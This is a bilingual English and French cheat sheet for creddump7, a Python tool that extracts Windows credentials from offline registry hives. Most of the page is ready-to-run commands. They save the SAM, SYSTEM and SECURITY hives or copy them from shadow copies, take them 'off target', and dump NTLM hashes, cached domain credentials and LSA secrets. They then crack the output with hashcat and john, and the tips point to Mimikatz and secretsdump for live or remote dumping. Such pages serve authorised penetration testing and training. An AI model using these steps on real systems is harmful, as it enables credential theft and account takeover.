creddump7

Extracteur d'identifiants Windows pour ruches de registre hors ligne. Extrait empreintes de mots de passe, identifiants en cache et secrets LSA depuis les fichiers de registre SAM, SYSTEM et SECURITY hors ligne. Windows credential dumper for offline registry hives. Extracts password hashes, cached credentials, and LSA secrets from offline SAM, SYSTEM, and SECURITY registry files.

↗ https://github.com/CiscoCXSecurity/creddump7

Overview

creddump7 is a Python tool for extracting Windows credentials from offline registry hive files. It handles SAM hashes, cached domain credentials (MSCache/MSCache2), and LSA secrets — useful when you have filesystem access but can’t run in-memory tools like Mimikatz.

Basic Usage

Dump SAM hashes (requires SAM + SYSTEM hives)

python3 pwdump.py SYSTEM SAM

Dump cached domain credentials (MSCache2)

python3 cachedump.py SYSTEM SECURITY

Dump LSA secrets

python3 lsadump.py SYSTEM SECURITY

Collecting Hives

# From Windows (as SYSTEM or admin):
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY

# From shadow copy (Volume Shadow Copy)
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM

# Copy files off target, then run creddump locally

Dump SAM Hashes

pwdump - outputs NTLM hashes in john/hashcat format

python3 pwdump.py /path/to/SYSTEM /path/to/SAM
# Output format:
# Administrator:500:LM_HASH:NT_HASH:::
# Guest:501:NO PASSWORD:::
# user:1000:LM_HASH:NT_HASH:::

Dump Cached Credentials

Cached domain credentials (DCC2/MSCache2)

python3 cachedump.py /path/to/SYSTEM /path/to/SECURITY
# Output: $DCC2$10240#username#hash
# Crack with hashcat -m 2100
hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt

Dump LSA Secrets

LSA secrets contain service account passwords, auto-logon creds, etc.

python3 lsadump.py /path/to/SYSTEM /path/to/SECURITY
# Common LSA secrets:
# $MACHINE.ACC   — machine account password
# DefaultPassword — auto-logon password
# DPAPI_SYSTEM   — DPAPI master key
# _SC_ServiceName — service account passwords

Cracking Extracted Hashes

Crack NTLM hashes with hashcat

hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt

Or with john

john --format=NT ntlm_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Crack MSCache2 (slower)

hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt

Tips

  • Requires both SYSTEM and SAM hives — the SYSTEM hive contains the boot key (syskey)
  • For live systems, prefer Mimikatz or impacket-secretsdump over offline tools
  • LSA secrets often contain cleartext service account passwords — high value
  • Cached credentials (DCC2) are slow to crack — prioritize NTLM hashes first
  • Use impacket’s secretsdump.py for remote dumping over SMB
Help / Man page
Scripts:
  pwdump.py SYSTEM SAM          — Dump local NTLM hashes
  cachedump.py SYSTEM SECURITY  — Dump cached domain credentials (DCC2)
  lsadump.py SYSTEM SECURITY    — Dump LSA secrets

All scripts take hive files as positional arguments.
SYSTEM hive is required for all (contains syskey/boot key).

Vue d’ensemble

creddump7 est un outil Python pour extraire des identifiants Windows depuis des fichiers de ruche de registre hors ligne. Il gère les empreintes SAM, les identifiants de domaine en cache (MSCache/MSCache2), et les secrets LSA : utile quand vous avez un accès au système de fichiers mais ne pouvez pas lancer d’outils en mémoire comme Mimikatz.

Utilisation de base

# Extraire les empreintes SAM (nécessite les ruches SAM + SYSTEM)
python3 pwdump.py SYSTEM SAM

# Extraire les identifiants de domaine en cache (MSCache2)
python3 cachedump.py SYSTEM SECURITY

# Extraire les secrets LSA
python3 lsadump.py SYSTEM SECURITY

Collecter les ruches

# Depuis Windows (en tant que SYSTEM ou admin) :
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY

# Depuis une shadow copy (Volume Shadow Copy)
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM

# Copier les fichiers hors de la cible, puis lancer creddump en local

Extraire les empreintes SAM

# pwdump : produit les empreintes NTLM au format john/hashcat
python3 pwdump.py /path/to/SYSTEM /path/to/SAM
# Format de sortie :
# Administrator:500:LM_HASH:NT_HASH:::
# Guest:501:NO PASSWORD:::
# user:1000:LM_HASH:NT_HASH:::

Extraire les identifiants en cache

# Identifiants de domaine en cache (DCC2/MSCache2)
python3 cachedump.py /path/to/SYSTEM /path/to/SECURITY
# Sortie : $DCC2$10240#username#hash
# Cracker avec hashcat -m 2100
hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt

Extraire les secrets LSA

# Les secrets LSA contiennent des mots de passe de comptes de service, des identifiants d'auto-logon, etc.
python3 lsadump.py /path/to/SYSTEM /path/to/SECURITY
# Secrets LSA courants :
# $MACHINE.ACC   : mot de passe du compte machine
# DefaultPassword : mot de passe d'auto-logon
# DPAPI_SYSTEM   : clé maîtresse DPAPI
# _SC_ServiceName : mots de passe de comptes de service

Cracker les empreintes extraites

# Cracker les empreintes NTLM avec hashcat
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt

# Ou avec john
john --format=NT ntlm_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Cracker le MSCache2 (plus lent)
hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt

Conseils

  • Nécessite à la fois les ruches SYSTEM et SAM : la ruche SYSTEM contient la boot key (syskey)
  • Pour les systèmes vivants, préférez Mimikatz ou impacket-secretsdump aux outils hors ligne
  • Les secrets LSA contiennent souvent des mots de passe de comptes de service en clair : grande valeur
  • Les identifiants en cache (DCC2) sont lents à cracker : priorisez d’abord les empreintes NTLM
  • Utilisez le secretsdump.py d’impacket pour une extraction à distance via SMB
Aide / Page de manuel
Scripts:
  pwdump.py SYSTEM SAM          — Dump local NTLM hashes
  cachedump.py SYSTEM SECURITY  — Dump cached domain credentials (DCC2)
  lsadump.py SYSTEM SECURITY    — Dump LSA secrets

All scripts take hive files as positional arguments.
SYSTEM hive is required for all (contains syskey/boot key).